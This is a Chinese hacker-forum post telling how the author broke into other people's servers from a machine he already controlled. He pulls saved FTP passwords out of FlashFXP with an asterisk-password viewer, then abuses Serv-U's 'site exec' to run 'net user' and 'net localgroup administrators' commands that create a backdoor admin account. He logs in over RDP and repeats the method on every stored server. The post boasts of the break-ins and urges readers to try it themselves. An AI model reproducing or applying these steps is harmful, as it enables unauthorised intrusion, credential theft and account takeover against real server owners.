| 来源:华夏黑客联盟 作者:职业色狼
前几天借朋友一台肉鸡,有一天又上去看了一下。发现这台肉鸡的桌面上有个FlashFXP,FlashFXP是功能强大的FXP/FTP软件,融合了一些其他优秀FTP软件的优点,如像CuteFTP一样可以比较文件夹,支持彩色文字显示;像BpFTP支持多文件夹选择文件,能够缓存文件夹;像LeapFTP一样的外观界面,甚至设计思路也差相仿佛.支持文件夹 (带子文件夹)的文件传送、删除;支持上传、下载及第三方文件续传;可以跳过指定的文件类型,只传送需要的文件;可以自定义不同文件类型的显示颜色;可以缓存远端文件夹列表,支持FTP代理及 Socks 4&5;具有避免空闲功能,防止被站点踢出;可以显示或隐藏“隐藏”属性的文件、文件夹;支持每个站点使用被动模式等.
但是这个工具有个弱点,我下载了服务器上的ftp文件,点开菜单栏的站点按纽,选择站点管理器。如图1。
可以看到管理员以前连接过的ftp都会记录在这里面,而且保存了密码。这个密码是星号的,可以通过星号密码查看工具来显示,此工具下载地址http://www.onlinedown.net/soft/28712.htm
打开星号密码查看器,把鼠标移动到星号密码处,可以看到密码是xxxivot,在服务器上我看见serv-u的配置勾选了执行,这样我们登陆后就可以执行命令。如图
而且每个服务器的帐号都是cz,这样大胆测试一下。ftp 219.138.xx.23 输入帐号cz 输入密码时不显示,回车显示230 登陆成功,执行quote site exec net user hxhack hxhack /add 回显200 成功建立一个帐户,quote sITe exec net localgroup administrators hxhack /add 成功添加到管理员组。
用3389登陆一下果然进去了。
呵呵打开flashfxp依次把所有服务器IP复制出来,ftp登陆进去按刚才方法逐个添加个用户并成功进入服务器。
这次能成功得手也是因为管理员的懒惰和粗心,也告诉了大家不必非得天天拿个扫描器到处扫,平时思维发挥一下,比如在服务器或者webshell里发现诸如此类的软件或者密码都可以去尝试,说不定就有意外的收获。
|
